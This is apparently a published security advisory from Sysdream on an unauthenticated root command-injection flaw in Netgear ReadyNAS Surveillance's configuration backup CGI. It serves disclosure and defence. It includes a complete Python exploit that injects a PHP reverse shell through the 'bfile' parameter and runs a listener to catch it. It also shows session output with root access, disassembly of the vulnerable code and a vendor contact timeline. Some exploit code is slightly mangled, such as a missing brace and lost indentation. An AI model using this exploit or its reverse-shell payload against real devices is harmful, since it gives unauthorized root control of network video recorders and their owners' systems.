Unauthenticated Remote Command Execution in Netgear ReadyNAS Surveillance
Netgear ReadyNAS Surveillance is a NVR (Network Video Recorder) available for Netgear NAS systems. A critical vulnerability has been found in Netgear ReadyNAS Surveillance configuration backup feature, allowing remote users to execute arbitrary commands as root.Product Description
Netgear ReadyNAS Surveillance is a NVR (Network Video Recorder) available for Netgear NAS systems.
Vulnerability Description
A critical vulnerability has been found in Netgear ReadyNAS Surveillance configuration backup feature, allowing remote users to execute arbitrary commands as root.
Unauthenticated Config File Download + Remote Root via RCE
Because the ReadyNAS Surveillance cgi_system cgi application doesn’t check the
user-provided « bfile » POST parameter and does not check if the user is authenticated, it’s
possible to execute arbitrary commands as root.
It’s also possible, without RCE, to download the ReadyNAS Surveillance configuration files.
Access Vector: remote
Security Risk: high
Vulnerability: CWE-88
Proof of Concept
#!/usr/bin/env python
import requests
import socket
import telnetlib
from thread import start_new_thread
from time import sleep
import argparse
def exploit(target, reverse):
print "[~] Sending payload..."
requests.post("http://%s/cgi-bin/cgi_system?cmd=saveconfig" % target,
"bfile": ";$(php -r '$sock=fsockopen(\"%s\",%d);exec(\"/bin/sh -i <&3 >&3 2>&3\");')" % reverse,
"inc_emap": "no",
"inc_pos": "no"})
def handler(handler, lport):
print "[~] Starting handler on port %d" % lport
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", lport))
conn, addr = s.accept()
print "[+] Connection from %s" % addr[0]
handler.sock = conn
if __name__ == "__main__":
print "[~] ReadyNAS Surveillance Remote Root Exploit (quick'n'dirty) - Nicolas Chatelain <n.chatelain[at]sysdream.com>"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True)
parser.add_argument("--localhost", required=True)
parser.add_argument("--localport", required=True, type=int)
args = parser.parse_args()
t = telnetlib.Telnet()
start_new_thread(handler, (t, args.localport))
sleep(1) # Just in case...
start_new_thread(exploit, (args.target, (args.localhost, args.localport)))
sleep(2) # Wait for it...
if t.sock_avail():
print "[+] Exploited."
print "[!!] Exploit failed."
Shell output :
nightlydev@nworkstation ~/Lab/ReadyNAS_Exploit $ python readyroot.py --target 10.x.x.2 --localhost 10.x.x.10 --localport 9999
[~] ReadyNAS Surveillance Remote Root Exploit (quick'n'dirty) - Nicolas Chatelain <n.chatelain[at]sysdream.com>
[~] Starting handler on port 9999
[~] Sending payload...
[+] Connection from 10.x.x.2
[+] Exploited.
/bin/sh: 0: can't access tty; job control turned off
# whoami
# id
uid=98(admin) gid=98(admin) euid=0(root) groups=0(root),27(sudo),42(shadow),98(admin)
Vulnerable code
The vulnerable code is located in the /apps/surveillance/bin/cgi_system file.
.text:00010CD8 LDR R2, =aCdSBinTarZcfSP ; "cd %s; /bin/tar -zcf %s passwd shadow"
.text:00010CDC MOV R0, R10 ; s
.text:00010CE0 STR LR, [SP,#0x1658+var_1658]
.text:00010CE4 BL snprintf
.text:00010CE8 MOV R0, R10 ; s
.text:00010CEC BL strlen
.text:00010CF0 LDR R1, =aDevNull2DevNul ; " > /dev/null 2>/dev/null"
.text:00010CF4 MOV R2, #0x19 ; n
.text:00010CF8 ADD R0, R10, R0 ; dest
.text:00010CFC BL memcpy
.text:00010D00 MOV R0, R10 ; command
.text:00010D04 BL system
Update to the latest version of Netgear ReadyNAS Surveillance.
Timeline (dd/mm/yyyy)
- 19/08/2015 : Initial discovery
- 20/08/2015 : First attempt to contact security[at]netgear.com -> No response
- September 2015 to December 2015 : Multiples attempts to contact security[at]netgear.com -> No response
- 20/01/2016 : Attempt to contact Netgear chat support
- 20/01/2016 : Response from Netgear, technical details and proof-of-concept sent.
- 20/01/2016 : Netgear confirms that exploit is working.
- 08/02/2016 : Netgear publishes security vulnerability announcement : http://kb.netgear.com/app/answers/detail/a_id/30275 and remove the ReadyNAS Surveillance package.
- 03/03/2016 : Netgear publishes a new version of ReadyNAS Surveillance that fixes the vulnerability.
- Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)